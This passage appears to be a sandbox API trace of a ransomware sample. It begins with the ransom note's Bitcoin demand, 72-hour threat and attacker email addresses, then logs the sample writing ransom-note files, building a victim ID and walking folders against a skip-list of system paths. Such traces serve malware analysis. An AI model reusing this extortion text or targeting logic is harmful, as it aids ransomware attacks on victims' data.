can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.928] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0174.930] CloseHandle (hObject=0x39c) returned 1
	[0174.934] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.935] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.935] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.935] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0174.936] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.937] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0174.937] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.937] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.937] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0174.938] CloseHandle (hObject=0x39c) returned 1
	[0174.938] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81caf47b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb93b0
	[0174.938] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*") returned 97
	[0174.938] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.939] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*") returned 0x61
	[0174.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0174.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.939] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0174.939] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0174.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0174.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.940] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0174.940] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0174.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0174.941] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.941] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0174.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0174.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0174.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.942] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.942] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0174.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.943] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0174.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.943] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0174.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.943] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0174.943] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.944] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0174.944] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.944] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0174.944] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.944] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.944] FindNextFileW (in: hFindFile=0xfb93b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81caf47b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0174.944] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.944] FindNextFileW (in: hFindFile=0xfb93b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81caf47b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81caf47b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81cd57ea, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.945] FindNextFileW (in: hFindFile=0xfb93b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c89266, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81c89266, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81caf47b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.945] FindNextFileW (in: hFindFile=0xfb93b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0174.945] FindNextFileW (in: hFindFile=0xfb93b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0174.945] FindClose (in: hFindFile=0xfb93b0 | out: hFindFile=0xfb93b0) returned 1
	[0174.945] FindClose (in: hFindFile=0xfb93b0 | out: hFindFile=0xfb93b0) returned 0
	[0174.946] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188325e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8188325e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8188325e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0174.946] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8188325e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8188325e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8188325e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x300061, dwReserved1=0x7d0039, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0174.946] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.946] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.946] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0174.947] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0174.947] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0174.947] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{c5dc3753-b6c8-4057-b396-bf13d769311c}", cAlternateFileName="{C5DC3~1")) returned 1
	[0174.957] lstrcmpW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="..") returned 1
	[0174.957] lstrcmpW (lpString1="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2=".") returned 1
	[0174.957] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0174.957] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0174.957] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}"
	[0174.958] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}"
	[0174.958] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\"
	[0174.958] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\"
	[0174.958] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*"
	[0174.958] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0174.989] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned 84
	[0174.989] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.989] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*") returned 0x54
	[0174.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.990] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="windows") returned 0x0
	[0174.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.990] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="boot") returned 0x0
	[0174.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.990] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="system volume information") returned 0x0
	[0174.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="temp") returned 0x0
	[0174.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="program files") returned 0x0
	[0174.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="appdata") returned 0x0
	[0174.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="application data") returned 0x0
	[0174.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="winnt") returned 0x0
	[0174.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="tmp") returned 0x0
	[0174.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="cache") returned 0x0
	[0174.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="webcache") returned 0x0
	[0174.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="inetcache") returned 0x0
	[0174.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="nvidia") returned 0x0
	[0174.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.994] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="packages") returned 0x0
	[0174.994] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="cookies") returned 0x0
	[0174.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*.*", lpSrch="programdata") returned 0x0
	[0174.995] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0174.995] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc2ab1, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xebc2ab1, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xebc2ab1, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x666, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0174.995] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0174.996] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0174.996] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\"
	[0174.996] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"
	[0174.996] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned 99
	[0174.996] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.996] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned 0x63
	[0174.996] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.996] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
